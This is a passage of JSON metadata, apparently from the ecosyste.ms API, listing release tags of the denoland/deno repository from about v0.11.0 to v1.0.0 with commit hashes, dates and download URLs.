,"manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.